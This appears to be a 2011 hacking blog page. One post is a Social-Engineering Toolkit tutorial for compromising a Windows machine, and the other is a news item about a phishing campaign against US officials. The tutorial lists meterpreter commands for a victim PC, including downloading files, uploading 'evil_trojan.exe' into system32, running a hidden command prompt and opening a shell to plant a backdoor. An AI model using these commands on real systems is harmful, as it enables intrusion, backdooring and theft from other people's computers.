Social engineering also known as human hack, social engineering is an act to manipulate human mind to get the desire goals. Social engineering is a general term and on daily life everyone implement it but usage of social engineering in hacking and penetration testing is little different. The main use of social engineering in hacking is to get the information, maintaining access and so on.
There are various social engineering tips and tricks available on the Internet beside these tips there is a social engineering toolkit available for implement computer based social engineering attack.
What Is Social Engineering Toolkit
In this article I will discuss about the usage of social engineering toolkit on backtrack 5 to hack a windows operating system, but before going to the actual tutorial I want to share the basic introduction of social engineering toolkit that would really help for the beginner.
The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.
Download
If you are using some other Linux distribution than use the command to get SET.
svn co http://svn.secmaniac.com/social_engineering_toolkit set/
Social Engineering Toolkit Tutorial
Well for this tutorial I am using backtrack 5 and the tutorial will teach you a single method to own a computer by using SET toolkit while more SET tutorial will be post on later articles. For the best result I have made video tutorial so,
As I have said on the video that more command on the article so here is the necessary commands.
ps
The 'ps' command displays a list of running processes on the target.
The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Download
meterpreter > download c:\\boot.ini
Upload
meterpreter > upload evil_trojan.exe c:\\windows\\system32
Execute
meterpreter > execute -f cmd.exe -i -H
shell
If you want to get the DOS screen of victim PC for downloading and upload your backdoor and other jobs use shell.
meterpreter > shellProcess 39640 created.Channel 2 created.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>
Enjoy the article than drop your comments.
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.
Posted: 13 Aug 2011 04:34 AM PDT
According to Google official blog phishing attack targeted "senior U.S. government officials, Chinese political activists, officials in several Asian countries (predominantly South Korea), military personnel and journalists." This is an old story time has changed but the aim of that attackers remain same.Phishing or fake page is a famous in which an attacker use some trick to get the credential information.
The attackers once again attack on US officials by using a phishing technique, however Gmail provides an extra security by the feature of 2-step verification. This time an attacker targeted to military and government employees and associates by using crafted email.
This attack is not similar with the normal phishing attack I mean that attacker did not provide any link or attachment of fake pages while they have used some tricks to make a user fool. They made the email look like a form for activating a subscription to a number of publications by The Center for a New American Security (CNAS), a Washington-based think tank.
When the victim has entered the confidential information, the information send to the server located in Houston, Texas, and the user redirected to the Gmail inbox. The attackers has not used any forwarding mechanism and than the account viewed by the attackers to check desired output.
Source: net-security.org
Source: net-security.org
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.
No comments:
Post a Comment